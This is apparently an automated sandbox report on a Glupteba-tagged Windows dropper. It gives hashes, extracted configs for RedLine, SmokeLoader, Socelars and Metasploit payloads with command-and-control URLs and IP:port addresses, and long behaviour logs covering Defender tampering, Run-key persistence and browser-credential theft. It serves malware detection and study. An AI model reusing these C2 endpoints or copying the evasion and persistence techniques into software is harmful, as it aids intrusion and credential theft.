glupteba | 32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3

Analysis

max time kernel
155s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
22-02-2022 05:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe
Size

9.6MB
MD5

df418b665c62a69256db41e8cbd189f6
SHA1

a2d9cbaaac5698d055a1893742d4ef2b0874b442
SHA256

32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3
SHA512

2e7f19c432a4d91bcca8e1eee2aee70887f3d9ea7fe9eda548b9ad7458810d7efaecd8562b28160598907b83bebcc68575c665cad016dcc5248815131e7562fc

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

Test 23.08

94.103.83.88:65136

Extracted

Family

redline

Botnet

cosmos

45.67.231.245:10429

Extracted

Family

redline

Botnet

333333

2.56.57.212:13040

Attributes

auth_value
3efa022bc816f747304fd68e5810bb78

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4092-181-0x00000000052E0000-0x0000000005C06000-memory.dmp	family_glupteba
behavioral2/memory/4092-182-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/4540-186-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/4916-200-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2968 3092 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2968	3092	rUNdlL32.eXe

RedLine Payload 15 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3504-201-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2064-225-0x0000000000D70000-0x0000000000FA1000-memory.dmp	family_redline
behavioral2/memory/2064-243-0x0000000000D72000-0x0000000000DA8000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\oN5377U4o_qR1x8UUdIPnw5F.exe	family_redline
behavioral2/memory/2064-227-0x0000000000D72000-0x0000000000DA8000-memory.dmp	family_redline
behavioral2/memory/2064-247-0x0000000000D70000-0x0000000000FA1000-memory.dmp	family_redline
behavioral2/memory/2064-248-0x0000000000D70000-0x0000000000FA1000-memory.dmp	family_redline
behavioral2/memory/3944-258-0x00000000001A0000-0x00000000001BE000-memory.dmp	family_redline
behavioral2/memory/5692-282-0x00000000000C0000-0x0000000000253000-memory.dmp	family_redline
behavioral2/memory/5872-286-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/5992-291-0x00000000008A0000-0x0000000000A62000-memory.dmp	family_redline
behavioral2/memory/5692-289-0x00000000000C0000-0x0000000000253000-memory.dmp	family_redline
behavioral2/memory/5692-288-0x00000000000C0000-0x0000000000253000-memory.dmp	family_redline
behavioral2/memory/3996-299-0x0000000000AF0000-0x0000000000C7B000-memory.dmp	family_redline
behavioral2/memory/4164-327-0x0000000003B00000-0x0000000003B2F000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 2520 created 2236 2520 WerFault.exe rundll32.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 2520 created 4092 2520 svchost.exe Info.exe
PID 2520 created 4916 2520 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

description	pid	process	target process
PID 2520 created 2236	2520	WerFault.exe	rundll32.exe

description	pid	process	target process
PID 2520 created 4092	2520	svchost.exe	Info.exe
PID 2520 created 4916	2520	svchost.exe	csrss.exe

Executes dropped EXE 24 IoCs

Processes:

md9_1sjm.exeSoCleanInst.exeFolder.exeInfo.exeUpdbdate.exenew23.exeFile.exeInstall.exepub2.exeFiles.exeFolder.exeWerFault.exejfiag3g_gg.exeInfo.execsrss.exenew23.exetqjOegMU3jScEUlDNgEDG8oK.exevMHbrGep8o912dpUI3tqXY9A.exeFTHQGIAO33QP2lIi2DUEwC1V.exe2Tv8_mPSi_59ygUFTQlgG9ca.exeHsPs0gIrdTB71ZVvAReV9Qj4.exe0r9BWtY4OEsfmZoQDEKwGHro.exeWerFault.exeKEh1RyqscDu67xoB9Xw3KqU8.exe

pid	process
4488	md9_1sjm.exe
2104	SoCleanInst.exe
4344	Folder.exe
4092	Info.exe
4992	Updbdate.exe
4316	new23.exe
2648	File.exe
4152	Install.exe
2428	pub2.exe
1852	Files.exe
2404	Folder.exe
2264	WerFault.exe
4528	jfiag3g_gg.exe
4540	Info.exe
4916	csrss.exe
3504	new23.exe
3528	tqjOegMU3jScEUlDNgEDG8oK.exe
1180	vMHbrGep8o912dpUI3tqXY9A.exe
4164	FTHQGIAO33QP2lIi2DUEwC1V.exe
3632	2Tv8_mPSi_59ygUFTQlgG9ca.exe
2064	HsPs0gIrdTB71ZVvAReV9Qj4.exe
1616	0r9BWtY4OEsfmZoQDEKwGHro.exe
4868	WerFault.exe
1716	KEh1RyqscDu67xoB9Xw3KqU8.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\iYPv5T5tHF1ON8tinJZA5Un_.exe	upx
C:\Users\Admin\Pictures\Adobe Films\iYPv5T5tHF1ON8tinJZA5Un_.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exeFolder.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	32a3a7a61634267009230564c139e3a42ec69175d0d7a764f31e54aa6013bfe3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2236 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2236	rundll32.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/2848-265-0x0000000000EF0000-0x00000000012B3000-memory.dmp	themida
behavioral2/memory/2848-268-0x0000000000EF0000-0x00000000012B3000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Info.exeFiles.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpringMeadow = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

30 ip-api.com
125 ipinfo.io
126 ipinfo.io
245 ipinfo.io
272 ipinfo.io
273 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

HsPs0gIrdTB71ZVvAReV9Qj4.exe

pid process

2064 HsPs0gIrdTB71ZVvAReV9Qj4.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

new23.exe

description pid process target process

PID 4316 set thread context of 3504 4316 new23.exe new23.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
30	ip-api.com
125	ipinfo.io
126	ipinfo.io
245	ipinfo.io
272	ipinfo.io
273	ipinfo.io

pid	process
2064	HsPs0gIrdTB71ZVvAReV9Qj4.exe

description	pid	process	target process
PID 4316 set thread context of 3504	4316	new23.exe	new23.exe

Drops file in Windows directory 9 IoCs

Processes:

svchost.exeInfo.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\rss\csrss.exe	Info.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\rss	Info.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2800	2236	WerFault.exe	rundll32.exe
3444	4092	WerFault.exe	Info.exe
3800	4092	WerFault.exe	Info.exe
4332	4092	WerFault.exe	Info.exe
1396	4092	WerFault.exe	Info.exe
1180	4092	WerFault.exe	Info.exe
3740	4092	WerFault.exe	Info.exe
4220	4092	WerFault.exe	Info.exe
2264	4092	WerFault.exe	Info.exe
2076	4092	WerFault.exe	Info.exe
4872	4092	WerFault.exe	Info.exe
3140	4092	WerFault.exe	Info.exe
1976	4092	WerFault.exe	Info.exe
3252	4092	WerFault.exe	Info.exe
2944	4092	WerFault.exe	Info.exe
4952	4092	WerFault.exe	Info.exe
4428	4092	WerFault.exe	Info.exe
4324	4092	WerFault.exe	Info.exe
2104	4092	WerFault.exe	Info.exe
2076	4092	WerFault.exe	Info.exe
4872	4092	WerFault.exe	Info.exe
2456	4092	WerFault.exe	Info.exe
1656	4540	WerFault.exe	Info.exe
4328	4540	WerFault.exe	Info.exe
3620	4540	WerFault.exe	Info.exe
3948	4540	WerFault.exe	Info.exe
1520	4540	WerFault.exe	Info.exe
1232	4540	WerFault.exe	Info.exe
1856	4540	WerFault.exe	Info.exe
736	4540	WerFault.exe	Info.exe
3712	4540	WerFault.exe	Info.exe
4152	4540	WerFault.exe	Info.exe
5044	4540	WerFault.exe	Info.exe
1224	4540	WerFault.exe	Info.exe
2976	4540	WerFault.exe	Info.exe
1660	4540	WerFault.exe	Info.exe
1736	4540	WerFault.exe	Info.exe
4356	4540	WerFault.exe	Info.exe
4700	4540	WerFault.exe	Info.exe
1460	4916	WerFault.exe	csrss.exe
4044	4916	WerFault.exe	csrss.exe
4760	4916	WerFault.exe	csrss.exe
4492	4916	WerFault.exe	csrss.exe
4884	4916	WerFault.exe	csrss.exe
1856	4916	WerFault.exe	csrss.exe
3004	4916	WerFault.exe	csrss.exe
3304	4916	WerFault.exe	csrss.exe
1028	4916	WerFault.exe	csrss.exe
3424	4916	WerFault.exe	csrss.exe
3260	4916	WerFault.exe	csrss.exe
4648	4916	WerFault.exe	csrss.exe
1608	4916	WerFault.exe	csrss.exe
2664	4916	WerFault.exe	csrss.exe
4300	4916	WerFault.exe	csrss.exe
3140	4916	WerFault.exe	csrss.exe
1236	4916	WerFault.exe	csrss.exe
4892	4916	WerFault.exe	csrss.exe
1436	4916	WerFault.exe	csrss.exe
3004	4916	WerFault.exe	csrss.exe
5088	4916	WerFault.exe	csrss.exe
4036	4916	WerFault.exe	csrss.exe
2204	4916	WerFault.exe	csrss.exe
3060	4916	WerFault.exe	csrss.exe
3952	4916	WerFault.exe	csrss.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\KEh1RyqscDu67xoB9Xw3KqU8.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\KEh1RyqscDu67xoB9Xw3KqU8.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3588 schtasks.exe
5204 schtasks.exe
5232 schtasks.exe
3808 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

5908 tasklist.exe

pid	process
3588	schtasks.exe
5204	schtasks.exe
5232	schtasks.exe
3808	schtasks.exe

pid	process
5908	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

640 taskkill.exe

pid	process
640	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	Info.exe
